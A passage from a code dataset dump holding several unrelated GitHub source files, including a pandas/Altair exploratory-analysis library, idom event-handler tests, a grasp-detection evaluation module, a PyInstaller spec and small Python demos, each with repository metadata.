VIEW Emprunts_par_ressource (id, nombre_emprunts) AS\n#SELECT Ressource.code, COUNT(Pret.id_pret)\n#FROM Ressource JOIN Exemplaire ON Ressource.code = Exemplaire.ressource JOIN Pret ON Exemplaire.id_pret = Pret.id_pret\n#GROUP BY (Ressource.code);\n\n#affichage du code de la ressource la plus populaire + nombre de prets\n sql = \"SELECT id, nombre_emprunts FROM Emprunts_par_ressource WHERE nombre_emprunts = (SELECT MAX(nombre_emprunts) FROM Emprunts_par_ressource)\"\n cur.execute(sql)\n row = cur.fetchone()\n id = row[0]\n nombre_emprunts = row[1]\n print(\"\\n> La ressource la plus populaire est\", id, \"avec un nombre de prets de\", nombre_emprunts);\n\n#CREATE VIEW populaire (id, nombre) AS\n#SELECT id, nombre_emprunts FROM Emprunts_par_ressource WHERE nombre_emprunts = (SELECT MAX(nombre_emprunts) FROM Emprunts_par_ressource) ;\n\n\ndef Nb_total_prets(conn): #affiche le nombre total de prets pour la bibliotheque\n cur = conn.cursor()\n sql ='SELECT COUNT(id_pret) AS nb_pret FROM Pret'\n cur.execute(sql)\n row = cur.fetchone()\n print(\"\\n> Nombre total de prets :\", row[0]);\n\n\n \n\n\n \n","repo_name":"cazicbor/Library-Manager","sub_path":"bibli.py","file_name":"bibli.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4735334616","text":"import numpy as np\nimport pandas as pd\nimport altair as alt\nfrom sklearn.impute import SimpleImputer\nimport warnings\n\n\ndef plot_intro(df, plot_title=\"\", theme_config=\"Dimension\"):\n \"\"\"Takes a dataframe with configurations and\n returns an altair object with summary metrics.\n\n Parameters\n -----------\n df: pd.DataFrame\n Dataframe from which to take columns\n not limited to numerical columns only\n plot_title : string, optional\n User can specify the plot title, by default to show the memory usage\n theme_config : list, optional\n A list of color configurations to be passed to theme, by default to use\n Demension as config\n\n Returns\n -------\n plot : altair.Chart object\n An altair plot object displaying summary metrics including the memory\n usage and the basic description of the input data.\n\n Examples\n -------\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, 0],\n 'num_wings': [2, 0, 0, 0],\n 'num_specimen_seen': [10, 2, 1, 8]})\n >>> instaeda_py.plot_intro(example_df)\n \"\"\"\n\n # Check basic information for input data\n sum_missing_columns = df.isnull().sum(axis=0)\n num_of_all_missing_columns = sum(sum_missing_columns)\n\n sum_missing_rows = df.isnull().sum(axis=1)\n num_complete_rows = df.shape[0] - sum(sum_missing_rows)\n\n # Create info dataframe\n info_df = pd.DataFrame(\n {\n \"rows\": df.shape[0],\n \"columns\": df.shape[1],\n \"numeric_columns\": len(\n list(df.select_dtypes(include=[np.number]).columns.values)\n ),\n \"all_missing_columns\": num_of_all_missing_columns,\n \"total_missing_values\": df.isnull().sum().sum(),\n \"complete_rows\": num_complete_rows,\n \"total_observations\": df.shape[0] * df.shape[1],\n \"memory_usage\": df.memory_usage(deep=True).sum(),\n },\n index=[0],\n )\n\n # Create the plotting dataframe\n plot_df = pd.DataFrame(\n {\n \"Metrics\": [\n \"Numeric Columns\",\n \"All Missing Columns\",\n \"Missing Observations\",\n \"Complete Rows\",\n ],\n \"Value\": [\n float(info_df[\"numeric_columns\"] / info_df[\"columns\"]),\n float(info_df[\"all_missing_columns\"] / info_df[\"columns\"]),\n float(info_df[\"total_missing_values\"] /\n info_df[\"total_observations\"]),\n float(info_df[\"complete_rows\"] / info_df[\"rows\"]),\n ],\n \"Dimension\": [\"column\", \"column\", \"observation\", \"row\"],\n }\n )\n\n # Create the plot\n\n # Check whether the user specifies a plotting title\n if len(plot_title) == 0:\n memory = float(info_df[\"memory_usage\"])\n plot_title = \"Memory Usage: \" + str(memory) + \"kb\"\n intro_plot = (\n alt.Chart(plot_df, title=plot_title)\n .mark_bar()\n .encode(\n alt.X(\"Value\", axis=alt.Axis(format=\"%\")),\n alt.Y(\"Metrics\"),\n color=alt.Color(theme_config),\n )\n )\n\n else:\n intro_plot = (\n alt.Chart(plot_df, title=plot_title)\n .mark_bar()\n .encode(\n alt.X(\"Value\", axis=alt.Axis(format=\"%\")),\n alt.Y(\"Metrics\"),\n color=alt.Color(theme_config),\n )\n )\n\n return intro_plot\n\n\ndef plot_corr(df, cols=None, method=\"pearson\", colour_palette=\"purpleorange\"):\n \"\"\"Takes a dataframe, subsets numeric columns and returns a correlation\n plot object.\n\n Parameters\n -----------\n df: pd.DataFrame\n Dataframe from which to take columns and calculate, plot correlation\n between columns.\n cols: list, optional\n List of columns to perform correlation on.\n By default, None (perform on all numeric).\n method : string, optional\n correlation calculation method, one of:\n {'pearson', 'kendall', 'spearman'}. By default 'pearson'\n colour_palette : string, optional\n one of Altair accepted colour schemes\n\n Returns\n -------\n plot : altair.Chart object\n Correlation plot object displaying column names and corresponding\n correlation values.\n\n Examples\n -------\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, 0],\n 'num_wings': [2, 0, 0, 0],\n 'num_specimen_seen': [10, 2, 1, 8]})\n >>> instaeda_py.plot_corr(example_df)\n \"\"\"\n\n # check user input\n correlation_methods = {\"pearson\", \"kendall\", \"spearman\"}\n colour_palette_list = {\n \"blueorange\",\n \"brownbluegreen\",\n \"purplegreen\",\n \"pinkyellowgreen\",\n \"purpleorange\",\n \"redblue\",\n \"redgrey\",\n \"redyellowblue\",\n \"redyellowgreen\",\n \"spectral\",\n }\n numeric_cols = [\"int16\", \"int32\", \"int64\", \"float16\", \"float32\", \"float64\"]\n if not isinstance(df, pd.DataFrame):\n raise Exception(\"must pass in pandas DataFrame\")\n if method not in correlation_methods:\n raise Exception(\"correlation method not acceptable\")\n if colour_palette not in colour_palette_list:\n warnings.warn(\"Recommended Altair continuous diverging colour palette\")\n\n # calculate\n if cols is None:\n if df.select_dtypes(np.number).shape[1] < 2:\n raise Exception(\n \"Dataframe does not have enough numeric columns for comparison\"\n )\n df = df.select_dtypes(include=numeric_cols)\n else:\n if df[cols].select_dtypes(np.number).shape[1] < 2:\n raise Exception(\n \"Dataframe does not have enough numeric columns for comparison\"\n )\n df = df[cols].select_dtypes(include=numeric_cols)\n corr_df = (\n round(df.corr(method=method), 4)\n .stack()\n .reset_index(name=\"corr\")\n .rename(columns={\"level_0\": \"variable_1\", \"level_1\": \"variable_2\"})\n )\n\n # plot base plot\n corr_plot = (\n alt.Chart(corr_df, title=\"Correlations between variables\")\n .mark_rect()\n .encode(\n x=alt.X(\"variable_1\", title=\"\"),\n y=alt.Y(\"variable_2\", title=\"\"),\n color=alt.Color(\n \"corr\", scale=alt.Scale(scheme=colour_palette, domain=(-1, 1))\n ),\n )\n .properties(height=400, width=400)\n )\n\n # plot corr values\n text = corr_plot.mark_text().encode(\n text=\"corr:Q\",\n color=alt.value(\"black\"))\n\n return corr_plot + text\n\n\ndef divide_and_fill(\n dataframe,\n cols=None,\n missing_values=np.nan,\n strategy=\"mean\",\n fill_value=None,\n random=False,\n parts=1,\n verbose=0,\n):\n \"\"\"Takes a dataframe, subsets selected columns and divides into parts for\n imputation of missing values and returns a data frame.\n\n Parameters\n -----------\n dataframe: pd.DataFrame\n Dataframe from which to take columns and check for missing values.\n cols: list, optional\n List of columns to perform imputation on.\n By default, None (perform on all numeric columns).\n missing_values: int, float, str, np.nan or None\n The placeholder for the missing values.\n All occurences of missing values will be imputed.\n strategy : string, optional\n imputation strategy, one of:\n {'mean', 'median', 'constant', 'most_frequent'}. By default, 'mean'.\n fill_value : string or numerical value, optional\n When strategy == 'constant', fill_value is used to replace all\n occurences of missing_values. If left to default, fill_value will be 0\n when filling numerical data and 'missing' for strings or\n object data types.\n random : boolean, optional\n When random == True, shuffles data frame before filling.\n By default, False.\n parts : integer, optional\n The number of parts to divide rows of data frame into. By default, 1.\n verbose : integer, optional\n Controls the verbosity of the divide and fill. By default, 0.\n\n\n Returns\n -------\n dataframe : pandas.DataFrame object\n Data frame obtained after divide and fill on the corresponding columns.\n\n Examples\n -------\n >>> import numpy as np\n >>> from instaeda import divide_and_fill\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, np.nan],\n 'num_wings': [2, np.nan, 0, 0],\n 'num_specimen_seen': [10, 2, 6, np.nan]})\n >>> divide_and_fill(example_df)\n \"\"\"\n filled_df = None\n allowed_strategies = [\"mean\", \"median\", \"constant\", \"most_frequent\"]\n\n # Checking inputs\n if verbose:\n print(\"Checking inputs\")\n\n if not isinstance(dataframe, pd.DataFrame):\n raise Exception(\"The input data must be of type pandas.DataFrame!\")\n\n if cols is None:\n cols = list(dataframe.select_dtypes(include=\"number\").columns)\n\n if (\n not isinstance(cols, list)\n or not all(isinstance(x, str) for x in cols)\n or not set(cols).issubset(set(dataframe.columns))\n ):\n raise Exception('''\n The input cols must be a list of strings belong to the column\n names for input dataframe!\n ''')\n\n if (\n not isinstance(missing_values, int)\n and not isinstance(missing_values, float)\n and not isinstance(missing_values, str)\n and (missing_values is not None)\n ):\n raise Exception('''\n The input missing values must be one of the following:\n (int, float, str, np.nan, None)\n ''')\n\n if strategy not in allowed_strategies:\n raise ValueError(\n \"Can only use these strategies: {0} got strategy = {1}\".format(\n allowed_strategies, strategy\n )\n )\n\n if (\n (fill_value is not None)\n and not isinstance(fill_value, int)\n and not isinstance(fill_value, float)\n and not isinstance(fill_value, str)\n ):\n raise Exception('''\n The input fill values must be one of the following:\n (int, float, str, None)\n ''')\n\n if not isinstance(random, bool):\n raise Exception(\"The input random must be True or False\")\n\n if not isinstance(parts, int) or (parts < 1):\n raise ValueError(\"Can only use positive integer parts.\")\n\n if not isinstance(verbose, int):\n raise ValueError(\"Can only use integer for verbose.\")\n\n # Constructing filled dataframe skeleton.\n if verbose:\n print(\"Constructing filled dataframe skeleton.\")\n\n if random:\n filled_df = dataframe.copy().sample(frac=1).reset_index(drop=True)\n else:\n filled_df = dataframe.copy()\n\n if (set(cols) <= set(dataframe.select_dtypes(include=\"number\").columns)):\n if isinstance(fill_value, str):\n raise ValueError('''\n For numeric columns,\n can only use fill values: (int, float, None)\n ''')\n elif (set(cols) <= set(dataframe.select_dtypes(exclude=\"number\").columns)):\n if isinstance(fill_value, int) or isinstance(fill_value, float):\n raise ValueError('''\n For non-numeric columns,\n can only use fill values: (None, str)\n ''')\n else:\n raise Exception('''\n All items in list cols must be numeric, or non-numeric.\n ''')\n\n # Filling data frame\n spacing = filled_df.shape[0]/(parts + 1)\n index = np.arange(0, filled_df.shape[0] + spacing, spacing, dtype=int)\n for i in range(len(index) - 1):\n imputer = SimpleImputer(\n missing_values=missing_values,\n strategy=strategy,\n fill_value=fill_value\n )\n filled_df.loc[index[i]: index[i + 1], cols] = imputer.fit_transform(\n filled_df.loc[index[i]: index[i + 1], cols]\n )\n\n if verbose:\n print(\"Returning data frame.\")\n return filled_df\n\n\ndef plot_basic_distributions(\n df,\n cols=None,\n include=None,\n vega_theme=\"ggplot2\"\n):\n \"\"\"Takes a dataframe and generates plots based on types\n\n Parameters\n -----------\n df: pd.DataFrame\n Dataframe from which to generate plots for each column from\n cols: list, optional\n List of columns to generate plots for.\n By default, None (builds charts for all columns).\n include: string, optional\n Select the data types to include. Supported values include None,\n \"string\" and \"number\".\n By default, None - it will return both string and number columns.\n vega_theme : string, optional\n Select the vega.themes for the altair plots.\n The options include: excel, ggplot2,\n quartz, vox, fivethirtyeight, dark, latimes, urbaninstitute,\n and googlecharts. By default, it uses ggplot2.\n\n Returns\n -------\n dict_plots: dict of altair.Chart objects using the column name as the key\n dictionary of generated altair.\n Chart objects with the column name as the key\n\n Examples\n -------\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, 0],\n 'num_wings': [2, 0, 0, 0],\n 'num_specimen_seen': [10, 2, 1, 8]})\n >>> instaeda_py.plot_distribution(example_df)\n \"\"\"\n if not isinstance(df, pd.DataFrame):\n raise TypeError(\"The df parameter must be a pandas dataframe\")\n\n if vega_theme not in (\n \"excel\",\n \"ggplot2\",\n \"quartz\",\n \"vox\",\n \"fivethirtyeight\",\n \"dark\",\n \"latimes\",\n \"urbaninstitute\",\n \"googlecharts\",\n ):\n warnings.warn('''\n You have selected a theme that is not one of\n the default Vega color themes.\n ''')\n # Set vega theme\n alt.renderers.enable(embed_options={\"theme\": vega_theme})\n\n dict_plots = {}\n df_data = None\n\n # First filter: select columns\n if cols is None:\n df_data = df\n else:\n df_data = df[cols]\n\n if include not in (None, \"number\", \"string\"):\n raise KeyError(\"\"\"\n The include parameter must be None, 'number' or 'string'\n \"\"\")\n\n # Second filter: select types to include\n if include == \"number\" or include is None:\n\n df_data_number = df_data.select_dtypes(include=\"number\")\n for col in df_data_number.columns.tolist():\n dict_plots[col] = (\n alt.Chart(df_data_number)\n .mark_bar()\n .encode(alt.X(col, bin=alt.Bin(maxbins=50)), y=\"count()\")\n )\n\n if include == \"string\" or include is None:\n\n df_data_string = df_data.select_dtypes(include=\"object\")\n for col in df_data_string.columns.tolist():\n dict_plots[col] = (\n alt.Chart(df_data_string)\n .mark_bar()\n .encode(x=alt.X(\"count()\"), y=alt.Y(col, sort=\"-x\"))\n )\n\n if len(dict_plots) == 0:\n warnings.warn(\n \"\"\"\n Zero plots were generated.\n Please ensure you specifiy the correct parameters for cols and include\n \"\"\")\n\n return dict_plots\n","repo_name":"UBC-MDS/instaeda_py","sub_path":"instaeda/instaeda.py","file_name":"instaeda.py","file_ext":"py","file_size_in_byte":16170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70162922077","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nfrom dataset_processing.grasp import GraspRectangles, detect_grasps, GraspRectangle, Grasps2GraspRectangles\n\n\ndef plot_output(rgb_img, depth_img, test_pred, no_grasps=1):\n \"\"\"\n Plot the output of a GG-CNN\n :param rgb_img: RGB Image\n :param depth_img: Depth Image\n :param grasp_q_img: Q output of GG-CNN\n :param grasp_angle_img: Angle output of GG-CNN\n :param no_grasps: Maximum number of grasps to plot\n :param grasp_width_img: (optional) Width output of GG-CNN\n :return:\n \"\"\"\n # gs = detect_grasps(grasp_q_img, grasp_angle_img, width_img=grasp_width_img, no_grasps=no_grasps)\n gs = Grasps2GraspRectangles(test_pred)\n\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(2, 2, 1)\n ax.imshow(rgb_img)\n # for g in gs:\n # g.plot(ax)\n gs.plot(ax)\n ax.set_title('RGB')\n ax.axis('off')\n\n ax = fig.add_subplot(2, 2, 2)\n ax.imshow(depth_img, cmap='gray')\n # for g in gs:\n # g.plot(ax)\n gs.plot(ax)\n ax.set_title('Depth')\n ax.axis('off')\n\n # ax = fig.add_subplot(2, 2, 3)\n # plot = ax.imshow(grasp_q_img, cmap='jet', vmin=0, vmax=1)\n # ax.set_title('Q')\n # ax.axis('off')\n # plt.colorbar(plot)\n\n # ax = fig.add_subplot(2, 2, 4)\n # plot = ax.imshow(grasp_angle_img, cmap='hsv', vmin=-np.pi / 2, vmax=np.pi / 2)\n # ax.set_title('Angle')\n # ax.axis('off')\n # plt.colorbar(plot)\n \n plt.show()\n\n\ndef calculate_iou_match(val_pred, ground_truth_bbs, no_grasps=1, grasp_width=None):\n \"\"\"\n Calculate grasp success using the IoU (Jacquard) metric (e.g. in https://arxiv.org/abs/1301.3592) #center, angle, \n A success is counted if grasp rectangle has a 25% IoU with a ground truth, and is withing 30 degrees.\n :param grasp_q: Q outputs of GG-CNN (Nx300x300x3)\n :param grasp_angle: Angle outputs of GG-CNN\n :param ground_truth_bbs: Corresponding ground-truth BoundingBoxes\n :param no_grasps: Maximum number of grasps to consider per image.\n :param grasp_width: (optional) Width output from GG-CNN\n :return: success\n \"\"\"\n\n # if not isinstance(ground_truth_bbs, GraspRectangles):\n # gt_bbs = GraspRectangles.load_from_array(ground_truth_bbs) #读入bbx的四个角的坐标\n # else:\n # gt_bbs = ground_truth_bbs\n # gs = detect_grasps(grasp_q, grasp_angle, width_img=grasp_width, no_grasps=no_grasps)\n\n gs = Grasps2GraspRectangles(val_pred)\n # print('gs:')\n # print(gs)\n # print(type(gs))\n # print(type(val_pred))\n gt_bbs = [ground_truth_bb.cpu() for ground_truth_bb in ground_truth_bbs]\n # print(gt_bbs)\n # print(type(gt_bbs))\n # print(gt_bbs[0])\n # print(gt_bbs[0][0])\n\n # gt_bbs = np.array(gt_bbs)\n # gs = np.array(gs)\n\n # gt_bbs = torch.from_numpy(gt_bbs)\n # gs = torch.from_numpy(gs)\n\n if gs.max_iou(gt_bbs) > 0.25:\n return True\n else:\n return False","repo_name":"HZWang96/robot-grasp-detection","sub_path":"dataset_processing/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"8447101634","text":"# -*- mode: python ; coding: utf-8 -*-\n\n\nblock_cipher = None\n\n\na = Analysis(\n [\"DP100_main.py\", \"DP100_gui.py\", \"DP100API.py\"],\n pathex=[],\n binaries=[],\n datas=[\n (\".\\\\ATK-DP100DLL(x64).dll\", \".\"),\n (\".\\\\ATK-DP100DLL(x86).dll\", \".\"),\n (\".\\\\icon.ico\", \".\"),\n ],\n hiddenimports=[\"pyi_splash\"],\n hookspath=[],\n hooksconfig={},\n runtime_hooks=[],\n excludes=[\n \"llvm\",\n \"matplotlib\",\n \"wx\",\n \"scipy\",\n \"PIL\",\n \"llvmlite\",\n \"numba\",\n ], #\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=True,\n)\nsplash = Splash(\n \"booting.png\",\n binaries=a.binaries,\n datas=a.datas,\n text_pos=(110, 468),\n text_size=12,\n text_color=\"#daff6e\",\n max_img_size=(760, 480),\n always_on_top=False,\n)\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\nexe = EXE(\n pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n splash, # <-- both, splash target\n splash.binaries, # <-- and splash binaries\n [],\n name=\"DP100GUI\",\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=False,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=False,\n disable_windowed_traceback=False,\n argv_emulation=False,\n target_arch=None,\n codesign_identity=None,\n entitlements_file=None,\n icon=\"icon.ico\",\n)\n# coll = COLLECT(\n# exe,\n# a.binaries,\n# a.zipfiles,\n# a.datas,\n# strip=False,\n# upx=False,\n# upx_exclude=[],\n# name=\"DP100GUI\",\n# )\n","repo_name":"ElluIFX/DP100","sub_path":"DP100GUI.spec","file_name":"DP100GUI.spec","file_ext":"spec","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4868756003","text":"from data import question_data\nfrom question_model import Question\nfrom quiz_brain import QuizBrain\n\nquestion_bank = []\n\n# Fills question_bank with Question objects produced from questin_data\nfor i in question_data:\n question_bank.append(Question(i['question'], i['correct_answer']))\n\n# Creates QuizBrain object with Question objects list question_bank\nquiz = QuizBrain(question_bank)\n\n# Starts questions\nquiz.next_question()\n\n# Checks if there are still questions and calls next\nwhile quiz.still_has_questions():\n quiz.next_question()\n\n# Final message\nprint(f'Finished! Your final Score is {quiz.score}, you answered correctly'\n f' {round(100 * quiz.score / len(quiz.questions_list))}% of all questions')","repo_name":"gskumlehn/python-bootcamp","sub_path":"2-Object-Oriented-Programming/quiz-game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33731727047","text":"import json\r\nimport matplotlib.pyplot as plt\r\nimport itertools\r\n\r\nmarker = itertools.cycle(('s', 'o', 'D', '>', '*')) \r\n\r\nsizes = [15, 20, 25, 30, 34]\r\n\r\nfig, ax = plt.subplots()\r\n\r\nfor size in sizes:\r\n with open(rf\"./results_{size}.json\", 'r') as f:\r\n results = json.load(f)\r\n\r\n ax.scatter(results['density'], results['speed'], label=f\"N={size}\", marker=next(marker))\r\nax.set_xlabel(\"density\")\r\nax.set_ylabel(\"speed\")\r\nax.set_title(\"Fundamental diagram for boids on a circular track\\nAlignment=False, Cohesion=False, Separation=False\")\r\nax.legend(title=\"population size\")\r\nfig.tight_layout()\r\nplt.show()","repo_name":"slejeune/swarm-intelligence","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21717388003","text":"import math\n\nimport torch\nfrom numpy import ndarray\nfrom torch import nn\nimport torch.nn.functional as f\nfrom processors.node_box_processor import NodeBoxProcessor\n\n\nclass CombinerProcessor(NodeBoxProcessor):\n def __init__(self, weights_file, input_size):\n self.model = CombinerModel(input_size)\n if weights_file is not None:\n self.model.load_state_dict(torch.load(weights_file))\n self.model.eval()\n\n def process(self, timestamp, features: ndarray) -> (int, list):\n \"\"\"Process the data and return the result as a tuple of (timestamp, result).\n The timestamp is the timestamp of when the result is predicted for\n\n features: price, ema, rsi, macd, volatility, channels\"\"\"\n return int(timestamp), [self.predict(features).item()]\n\n def predict(self, features: ndarray):\n with torch.no_grad():\n x = torch.tensor(features).type(torch.cuda.FloatTensor)\n return self.model(x)\n\n\nclass CombinerModel(nn.Module):\n def __init__(self, input_size):\n data_type = torch.cuda.FloatTensor\n super().__init__()\n self.fc1 = nn.Linear(input_size, input_size*2).type(data_type)\n self.fc1.weight.data.uniform_(-0.1, 0.1)\n self.fc2 = nn.Linear(input_size*2, math.ceil(input_size*0.5)).type(data_type)\n self.fc2.weight.data.uniform_(-0.1, 0.1)\n self.fc3 = nn.Linear(math.ceil(input_size*0.5), 1).type(data_type)\n self.fc3.weight.data.uniform_(-0.1, 0.1)\n\n def forward(self, x):\n x = f.leaky_relu(self.fc1(x))\n x = f.leaky_relu(self.fc2(x))\n y = f.leaky_relu(self.fc3(x))\n return y\n","repo_name":"Coec0/MachineStock","sub_path":"node-box/processors/combiner_processor.py","file_name":"combiner_processor.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36253623455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# app.py (Python)\n# \n# Objetivo: Criar um frame com uma label e um botão no Tkinter.\n# \n# Site: https://dirack.github.io\n# \n# Versão 1.0\n# \n# Programador: Rodolfo A C Neves (Dirack) 05/09/2020\n# \n# Email: rodolfo_profissional@hotmail.com\n# \n# Licença: GPL-3.0 .\n\nfrom Tkinter import *\n\nclass Application:\n\t\n\tdef __init__(self, master=None):\n\t\tself.widget1 = Frame(master)\n\t\tself.widget1.pack()\n\t\tself.msg = Label(self.widget1, text=\"Primeiro widget\")\n\t\tself.msg[\"font\"] = (\"Verdana\", \"10\", \"italic\", \"bold\")\n\t\tself.msg.pack ()\n\t\tself.sair = Button(self.widget1)\n\t\tself.sair[\"text\"] = \"Sair\"\n\t\tself.sair[\"font\"] = (\"Calibri\", \"10\")\n\t\tself.sair[\"width\"] = 5\n\t\tself.sair[\"command\"] = self.widget1.quit\n\t\tself.sair.pack ()\n\nroot = Tk()\nApplication(root)\nroot.mainloop()\n","repo_name":"Dirack/Estudos","sub_path":"Python/Tkinter/basicInterface/widgetWithLabel/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"6280497591","text":"import pytest\n\nimport idom\nfrom idom.core.events import (\n EventHandler,\n merge_event_handler_funcs,\n merge_event_handlers,\n to_event_handler_function,\n)\n\n\ndef test_event_handler_repr():\n handler = EventHandler(lambda: None)\n assert repr(handler) == (\n f\"EventHandler(function={handler.function}, prevent_default=False, \"\n f\"stop_propagation=False, target={handler.target!r})\"\n )\n\n\ndef test_event_handler_props():\n handler_0 = EventHandler(lambda data: None)\n assert handler_0.stop_propagation is False\n assert handler_0.prevent_default is False\n assert handler_0.target is None\n\n handler_1 = EventHandler(lambda data: None, prevent_default=True)\n assert handler_1.stop_propagation is False\n assert handler_1.prevent_default is True\n assert handler_1.target is None\n\n handler_2 = EventHandler(lambda data: None, stop_propagation=True)\n assert handler_2.stop_propagation is True\n assert handler_2.prevent_default is False\n assert handler_2.target is None\n\n handler_3 = EventHandler(lambda data: None, target=\"123\")\n assert handler_3.stop_propagation is False\n assert handler_3.prevent_default is False\n assert handler_3.target == \"123\"\n\n\ndef test_event_handler_equivalence():\n async def func(data):\n return None\n\n assert EventHandler(func) == EventHandler(func)\n\n assert EventHandler(lambda data: None) != EventHandler(lambda data: None)\n\n assert EventHandler(func, stop_propagation=True) != EventHandler(\n func, stop_propagation=False\n )\n\n assert EventHandler(func, prevent_default=True) != EventHandler(\n func, prevent_default=False\n )\n\n assert EventHandler(func, target=\"123\") != EventHandler(func, target=\"456\")\n\n\nasync def test_to_event_handler_function():\n call_args = idom.Ref(None)\n\n async def coro(*args):\n call_args.current = args\n\n def func(*args):\n call_args.current = args\n\n await to_event_handler_function(coro, positional_args=True)([1, 2, 3])\n assert call_args.current == (1, 2, 3)\n\n await to_event_handler_function(func, positional_args=True)([1, 2, 3])\n assert call_args.current == (1, 2, 3)\n\n await to_event_handler_function(coro, positional_args=False)([1, 2, 3])\n assert call_args.current == ([1, 2, 3],)\n\n await to_event_handler_function(func, positional_args=False)([1, 2, 3])\n assert call_args.current == ([1, 2, 3],)\n\n\nasync def test_merge_event_handler_empty_list():\n with pytest.raises(ValueError, match=\"No event handlers to merge\"):\n merge_event_handlers([])\n\n\n@pytest.mark.parametrize(\n \"kwargs_1, kwargs_2\",\n [\n ({\"stop_propagation\": True}, {\"stop_propagation\": False}),\n ({\"prevent_default\": True}, {\"prevent_default\": False}),\n ({\"target\": \"this\"}, {\"target\": \"that\"}),\n ],\n)\nasync def test_merge_event_handlers_raises_on_mismatch(kwargs_1, kwargs_2):\n def func(data):\n return None\n\n with pytest.raises(ValueError, match=\"Cannot merge handlers\"):\n merge_event_handlers(\n [\n EventHandler(func, **kwargs_1),\n EventHandler(func, **kwargs_2),\n ]\n )\n\n\nasync def test_merge_event_handlers():\n handler = EventHandler(lambda data: None)\n assert merge_event_handlers([handler]) is handler\n\n calls = []\n merged_handler = merge_event_handlers(\n [\n EventHandler(lambda data: calls.append(\"first\")),\n EventHandler(lambda data: calls.append(\"second\")),\n ]\n )\n await merged_handler.function({})\n assert calls == [\"first\", \"second\"]\n\n\ndef test_merge_event_handler_funcs_empty_list():\n with pytest.raises(ValueError, match=\"No event handler functions to merge\"):\n merge_event_handler_funcs([])\n\n\nasync def test_merge_event_handler_funcs():\n calls = []\n\n async def some_func(data):\n calls.append(\"some_func\")\n\n async def some_other_func(data):\n calls.append(\"some_other_func\")\n\n assert merge_event_handler_funcs([some_func]) is some_func\n\n merged_handler = merge_event_handler_funcs([some_func, some_other_func])\n await merged_handler([])\n assert calls == [\"some_func\", \"some_other_func\"]\n\n\ndef test_can_prevent_event_default_operation(driver, display):\n @idom.component\n def Input():\n @idom.event(prevent_default=True)\n async def on_key_down(value):\n pass\n\n return idom.html.input({\"onKeyDown\": on_key_down, \"id\": \"input\"})\n\n display(Input)\n\n inp = driver.find_element(\"id\", \"input\")\n inp.send_keys(\"hello\")\n # the default action of updating the element's value did not take place\n assert inp.get_attribute(\"value\") == \"\"\n\n\ndef test_simple_click_event(driver, display):\n @idom.component\n def Button():\n clicked, set_clicked = idom.hooks.use_state(False)\n\n async def on_click(event):\n set_clicked(True)\n\n if not clicked:\n return idom.html.button({\"onClick\": on_click, \"id\": \"click\"}, [\"Click Me!\"])\n else:\n return idom.html.p({\"id\": \"complete\"}, [\"Complete\"])\n\n display(Button)\n\n button = driver.find_element(\"id\", \"click\")\n button.click()\n driver.find_element(\"id\", \"complete\")\n\n\ndef test_can_stop_event_propogation(driver, driver_wait, display):\n clicked = idom.Ref(False)\n\n @idom.component\n def DivInDiv():\n @idom.event(stop_propagation=True)\n def inner_click_no_op(event):\n clicked.current = True\n\n def outer_click_is_not_triggered(event):\n assert False\n\n outer = idom.html.div(\n {\n \"style\": {\n \"height\": \"35px\",\n \"width\": \"35px\",\n \"backgroundColor\": \"red\",\n },\n \"onClick\": outer_click_is_not_triggered,\n \"id\": \"outer\",\n },\n idom.html.div(\n {\n \"style\": {\n \"height\": \"30px\",\n \"width\": \"30px\",\n \"backgroundColor\": \"blue\",\n },\n \"onClick\": inner_click_no_op,\n \"id\": \"inner\",\n },\n ),\n )\n return outer\n\n display(DivInDiv)\n\n inner = driver.find_element(\"id\", \"inner\")\n inner.click()\n\n driver_wait.until(lambda _: clicked.current)\n","repo_name":"Archmonger/reactpy","sub_path":"tests/test_core/test_events.py","file_name":"test_events.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"31940168099","text":"from pydantic import BaseModel\nimport hashlib\nimport json\nfrom datetime import datetime\nfrom olympia.train import duration, harmony, sequence, ModelSettings\nfrom olympia.data import song\n\n\ndef train_model(song_objs, settings=None, run_duration=False, run_sequence=False, run_harmony=False):\n\n model_settings = None\n if settings:\n model_settings = ModelSettings(**settings)\n\n else:\n model_settings = ModelSettings()\n\n if run_sequence:\n sequence_model = sequence.SequenceModel(song_objs, model_settings)\n sequence_model.train_sequences()\n\n if 